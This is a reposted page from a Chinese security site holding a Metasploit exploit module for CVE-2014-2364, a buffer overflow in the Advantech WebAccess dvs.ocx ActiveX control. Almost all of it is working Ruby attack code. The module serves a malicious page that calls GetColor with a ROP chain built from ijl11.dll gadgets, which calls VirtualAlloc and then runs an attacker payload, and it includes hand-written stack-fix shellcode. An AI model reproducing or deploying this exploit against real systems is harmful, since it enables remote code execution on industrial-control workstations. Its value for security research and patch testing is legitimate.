首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Advantech WebAccess dvs.ocx GetColor Buffer Overflow
来源:metasploit.com 作者:vazquez 发布时间:2014-09-25  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::BrowserExploitServer
  
  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
      'Description'         => %q{
        This module exploits a buffer overflow vulnerability in Advantec WebAccess. The
        vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
        sprintf can be reached with user controlled data through the GetColor function.
        This module has been tested successfully on Windows XP SP3 with IE6 and Windows
        7 SP1 with IE8 and IE 9.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Unknown', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'          =>
        [
          ['CVE', '2014-2364'],
          ['ZDI', '14-255'],
          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
        ],
      'DefaultOptions'      =>
        {
          'Retries'              => false,
          'InitialAutoRunScript' => 'migrate -f'
        },
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => Msf::OperatingSystems::WINDOWS,
          :ua_name => /MSIE/i,
          :ua_ver  => lambda { |ver| Gem::Version.new(ver) <  Gem::Version.new('10') },
          :clsid   => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
          :method  => "GetColor"
        },
      'Payload'             =>
        {
          'Space'           => 1024,
          'DisableNops'     => true,
          'BadChars'        => "\x00\x0a\x0d\x5c",
          # Patch the stack to execute the decoder...
          'PrependEncoder'  => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
          # Fix the stack again, this time better :), before the payload
          # is executed.
          'Prepend'         => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
                               "\x83\xC0\x08"             + # add eax, byte 8
                               "\x8b\x20"                 + # mov esp, [eax]
                               "\x81\xC4\x30\xF8\xFF\xFF"  # add esp, -2000
        },
      'Platform'            => 'win',
      'Arch'                => ARCH_X86,
      'Targets'             =>
        [
          [ 'Automatic', { } ]
        ],
      'DefaultTarget'       => 0,
      'DisclosureDate'      => 'Jul 17 2014'))
  end
  
  def on_request_exploit(cli, request, target_info)
    print_status("Requested: #{request.uri}")
  
    content = <<-EOS
<html>
<head>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
</head>
<body>
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
<script language='javascript'>
test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
</script>
</body>
</html>
    EOS
  
    print_status("Sending #{self.name}")
    send_response_html(cli, content, {'Pragma' => 'no-cache'})
  end
  
  # Uses gadgets from ijl11.dll 1.1.2.16
  def rop_payload(code)
    xpl = rand_text_alphanumeric(61) # offset
    xpl << [0x60014185].pack("V")    # RET
    xpl << rand_text_alphanumeric(8)
  
    # EBX = dwSize (0x40)
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << [0x9ffdafc9].pack("V") # eax value
    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
    xpl << [0x60018084].pack("V") # POP EBP # RETN
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
    xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
    # EDX = flAllocationType (0x1000)
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << [0x9ffdbf89].pack("V") # eax value
    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
    # ECX = flProtect (0x40)
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    0x41.times do
      xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
    end
    # EAX = ptr to &VirtualAlloc()
    xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
    xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]
    # EBP = POP (skip 4 bytes)
    xpl << [0x6002054b].pack("V") # POP EBP # RETN
    xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)
    # ESI = ptr to JMP [EAX]
    xpl << [0x600181cc].pack("V") # POP ESI # RETN
    xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])
    # EDI = ROP NOP (RETN)
    xpl << [0x60021ad1].pack("V") # POP EDI # RETN
    xpl << [0x60021ad2].pack("V") # ptr to &(retn)
    # ESP = lpAddress (automatic)
    # PUSHAD # RETN
    xpl << [0x60018399].pack("V") # PUSHAD # RETN
    xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)
    xpl << code
  
    xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
    xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping
  
    xpl
  end
  
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EMC AlphaStor Device Manager O
·Bash Code Injection Proof Of C
·ZyXEL Prestig P-660HNU-T1 ISP
·Bash Environment Variable Comm
·WS10 Data Server SCADA Exploit
·xcode-select 13.4.0 Buffer Ove
·GNU bash Environment Variable
·Fast Image Resizer 098 - Local
·GNU bash Environment Variable
·Joomla Face Gallery 1.0 Multip
·Nucom ADSL ADSLR5000UN ISP Cre
·Joomla Mac Gallery <= 1.5 Arbi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved